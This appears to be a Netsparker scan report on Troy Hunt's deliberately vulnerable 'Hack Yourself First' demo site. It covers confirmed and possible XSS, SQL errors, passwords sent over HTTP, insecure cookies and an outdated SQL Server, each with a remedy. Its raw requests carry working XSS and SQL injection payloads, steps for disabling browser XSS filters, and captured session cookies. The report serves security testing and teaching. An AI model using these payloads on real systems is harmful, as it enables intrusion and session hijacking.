   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value '_2dilemma' to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
IMPORTANT: 1 TOTAL, 1 CONFIRMED
3. Cross-site Scripting
Netsparker detected cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.
Impact: There are many different attacks that can be leveraged through the use of cross-site scripting, including:
- Hijacking user's active session
- Mounting phishing attacks
- Intercepting data and performing man-in-the-middle attacks
Remedy: The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes into a JavaScript block within the HTML document, then output needs to be encoded accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.
Remedy References: Microsoft Anti-XSS Library; OWASP XSS Prevention Cheat Sheet; OWASP AntiSamy Java
External References: XSS Cheat Sheet; OWASP - Cross-site Scripting; XSS Shell; XSS Tunnelling
Proof of Concept Notes: Generated XSS exploit might not work due to browser XSS filtering. Please follow the guidelines below in order to disable XSS filtering for different browsers. Also note that XSS filtering is a feature that's enabled by default in some of the modern browsers. It should only be disabled temporarily to test exploits and should be reverted back if the browser is actively used other than for testing purposes. Even though browsers have certain checks to prevent Cross-site scripting attacks, in practice there are a variety of ways to bypass this mechanism, therefore a web application should not rely on this kind of client-side browser checks.
Chrome: Open command prompt. Go to folder where chrome.exe is located. Run the command: chrome.exe --args --disable-xss-auditor
Internet Explorer: Click Tools -> Internet Options and then navigate to the Security Tab. Click Custom level and scroll towards the bottom, where you will find that Enable XSS filter is currently Enabled. Set it to disabled. Click OK. Click Yes to accept the warning, followed by Apply.
Firefox: Go to about:config in the URL address bar. In the search field type urlbar.filter and find browser.urlbar.filter.javascript. Set its value to false by double clicking the row.
Classification: OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
3.1 /Search CONFIRMED http://hackyourselffirst.troyhunt.com/Search?searchTerm='%2Bnetsparker(9)%2B'
Parameters:
Parameter	Type	Value
searchTerm	GET	'+netsparker(9)+'
Request:
GET /Search?searchTerm='%2Bnetsparker(9)%2B' HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response:
…</section></div></div></div></div></header>
<div class="container"><section>
<h2>You searched for &quot;<span id="searchTerm">'+netsparker(9)+'</span>&quot;</h2>
<p class="alert alert-error">No results found for your search.</p>
</section><hr><footer><p>&copy; 2014 - Hack Yourself First</p></footer>
…></script>
<script>$('#results tr').click(function () { var url = '/Supercar/' + $(this).attr('id'); window.location.href = url; });
$('#searchTerm').val(''+netsparker(9)+'');</script>
<script>(function (i, s, o, g, r, a, m) { i['GoogleAnalyticsObject'] = r; i[r] = i[r] || function () { (i[r].q = i[r].q || []).push(arguments) }, i[r…
IMPORTANT: 1 TOTAL, 1 CONFIRMED
4. Permanent Cross-site Scripting
Netsparker identified permanent cross-site scripting and confirmed this vulnerability by analyzing the execution of injected JavaScript.
Permanent XSS allows an attacker to execute dynamic scripts (JavaScript, VBScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by the user has been interpreted by HTML/JavaScript/VBScript within the browser.
Permanent means that the attack will be stored in the backend system. In normal XSS attacks an attacker needs to e-mail the victim, but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.
XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' sessions, the attacker might attack an administrator to gain full control over the application.
Impact: Permanent XSS is a dangerous issue that has many exploitation vectors, some of which include:
- User's session-sensitive information, such as cookies, can be stolen
- XSS can enable client-side worms which could modify, delete or steal other users' data within the application
- The website can be redirected to a new location, defaced or used as a phishing site
Remedy: The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML, ensure all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a whitelist. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured whitelist libraries available for many different environments; good examples of these include the OWASP Reform and Microsoft Anti-cross-site scripting libraries.
Remedy References: [ASP.NET] - Microsoft Anti-XSS Library; OWASP XSS Prevention Cheat Sheet; OWASP AntiSamy Java
External References: XSS Cheat Sheet; OWASP - Cross-site Scripting; XSS Shell; XSS Tunnelling
Classification: OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
4.1 /Supercar/3 CONFIRMED http://hackyourselffirst.troyhunt.com/Supercar/3
Injection URL: http://hackyourselffirst.troyhunt.com/api/vote
Injection Request:
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept:
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 77
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%22%3e%3cnet+sparker%3dnetsparker(0x00043F)%3e

Identification Request:
GET /Supercar/3 HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Injection Response:
HTTP/1.1 201 Created
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:53 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Expires: -1

Identification Response:
…1)) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)),1,1)),0)=1</td></tr><tr><td>Troy Hunt</td><td>"><net sparker=netsparker(0x00043F)></td></tr><tr><td>Troy Hunt</td><td>-1 OR 1=1) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)…
IMPORTANT
TOTAL: 1
CONFIRMED: 1
5. Password Transmitted over HTTP
Netsparker detected that password data is being transmitted over HTTP.
Impact: If an attacker can intercept network traffic, he/she can steal users' credentials.
Actions to Take: 1. See the remedy for solution. 2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.
Remedy: All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.
Classification: OWASP 2010-A9, OWASP 2013-A6, PCI v2.0-6.5.4, PCI v3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
5.1 /Account/Register CONFIRMED http://hackyourselffirst.troyhunt.com/Account/Register
Form target action: http://hackyourselffirst.troyhunt.com/Account/Register
Request:
GET /Account/Register HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2265
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Register - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
IMPORTANT
TOTAL: 1
CONFIRMED: 1
6. Cookie Not Marked as Secure
Netsparker identified a cookie not marked as secure, and transmitted over HTTPS.
This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic, or following a successful man-in-the-middle attack.
Impact: This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie), an attacker might intercept it and hijack a victim's session. If the attacker can carry out a man-in-the-middle attack, he/she can force the victim to make an HTTP request to steal the cookie.
Actions to Take: 1. See the remedy for solution. 2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information, you do not have to mark it as secure.)
Remedy: Mark all cookies used within the application as secure.
Required Skills for Successful Exploitation: To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or to the victim's network. Attackers need to understand layer 2, have physical access to systems either as waypoints for the traffic, or have locally gained access to a system between the victim and the web server.
External References: .NET Cookie.Secure Property; How to Create Totally Secure Cookies
Classification: OWASP 2010-A9, OWASP 2013-A6, PCI v2.0-6.5.4, PCI v3.0-6.5.4, CWE-614, CAPEC-102, WASC-15
6.1 /Account/Login CONFIRMED https://hackyourselffirst.troyhunt.com/Account/Login
Identified Cookie: AuthCookie
Request:
POST /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/Account/Login
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 57
Content-Type: application/x-www-form-urlencoded

Email=netsparker%40example.com&Password=3&RememberMe=true
Response:
HTTP/1.1 302 Found
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:00 GMT
Location: http://hackyourselffirst.troyhunt.com/
Server: Microsoft-IIS/8.0
Set-Cookie: AuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Set-Cookie: Password=Mw==; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Set-Cookie: Email=netsparker@example.com; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 155
Content-Type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://hackyourselffirst.troyhunt.com/">here</a>.</h2></body></html>
IMPORTANT
TOTAL: 1
7. Out-of-date Version (Microsoft SQL Server)
Netsparker identified you are using an out-of-date version of Microsoft SQL Server.
Impact: Since this is an old version of the software, it may be vulnerable to attacks.
Remedy: Please upgrade your installation of Microsoft SQL Server to the latest stable version.
Classification: OWASP 2010-A6, OWASP 2013-A9, PCI v2.0-6.1, PCI v3.0-6.1, CAPEC-310
7.1 /Make/1 http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Identified Version: 11.0.9222.17
Latest Version: 12.0.2000
Vulnerability Database: Result is based on 18/08/2014 vulnerability database content.
Certainty:
Request:
GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:55 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; } @media screen and (max-width: 639px) { pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; } } @media screen and (max-width: 479px) { pre { width: 280px; } } </style></head>
<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please revie…
MEDIUM
TOTAL: 1
CONFIRMED: 1
8. Critical Form Served over HTTP
Netsparker detected that a critical form is served over HTTP.
Impact: If an attacker can carry out a man-in-the-middle attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or changing the action of the HTTP code to steal the user's password. Even though the target page is HTTPS, this does not protect the system against man-in-the-middle attacks.
This issue is important as it negates the use of SSL as a privacy protection barrier.
Actions to Take: 1. See the remedy for solution. 2. Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP.
Remedy: All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.
Classification: OWASP 2010-A9, OWASP 2013-A6, PCI v2.0-6.5.4, PCI v3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
8.1 /Account/Login CONFIRMED http://hackyourselffirst.troyhunt.com/Account/Login
Form target action: https://hackyourselffirst.troyhunt.com/Account/Login
Request:
GET /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2549
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Log in - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li><…
MEDIUM
TOTAL: 3
9. [Possible] Cross-site Scripting
Netsparker detected possible cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.
Although Netsparker believes there is a cross-site scripting in here, it could not confirm it. We strongly recommend investigating the issue manually to ensure it is cross-site scripting and needs to be addressed.
Impact: There are many different attacks that can be leveraged through the use of XSS, including:
Hijacking user's active session
Changing the look of the page within the victim's browser
Mounting a successful phishing attack
Intercepting data and performing man-in-the-middle attacks
Remedy: This issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered/encoded. Output should be filtered/encoded according to the output format and location.
There are a number of pre-defined, well-structured whitelist libraries available for many different environments. Good examples of these include OWASP Reform and Microsoft Anti-cross-site scripting libraries.
Remedy References: [ASP.NET] - Microsoft Anti-XSS Library; OWASP XSS Prevention Cheat Sheet
External References: XSS Cheat Sheet; OWASP - Cross-site Scripting; XSS Shell; XSS Tunnelling
Classification: OWASP 2010-A2, OWASP 2013-A3, PCI v2.0-6.5.7, PCI v3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
9.1 /api/vote http://hackyourselffirst.troyhunt.com/api/vote
Parameters:
Parameter | Type | Value
userId | POST | 1
supercarId | POST | 3
comments | POST | '"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>
Notes: Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
Certainty:
Request:
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 90
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments='"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>

Response:
HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:47 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 2985
Content-Type: application/json; charset=utf-8
Expires: -1

{"Message":"An error has occurred.","ExceptionMessage":"Unclosed quotation mark after the character string '--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>)'.\r\nIncorrect syntax near '--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>)'.","ExceptionType":"System.Data.SqlClient.SqlException","StackTrace":"   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)\r\n   at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)\r\n   at System.Data.SqlClient.SqlCommand.RunExecuteNonQueryTds(String methodName, Boolean async, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.InternalExecuteNonQuery(TaskCompletionSource`1 completion, String methodName, Boolean sendToPipe, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.ExecuteNonQuery()\r\n   at Web.Controllers.VoteController.Post(Vote vote)\r\n   at lambda_method(Closure , Object , Object[] )\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.<>c__DisplayClass10.<GetExecutor>b__9(Object instance, Object[] methodParameters)\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.Execute(Object instanc…
9.2 /api/admin http://hackyourselffirst.troyhunt.com/api/admin?nsextt=%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt
Parameters:
Parameter | Type | Value
nsextt | GET | "--></style></scRipt><scRipt>netsparker(0x0002E0)</scRipt>
Notes: Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
Certainty:
Request:
GET /api/admin?nsextt=%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x0002E0)%3C/scRipt%3E HTTP/1.1
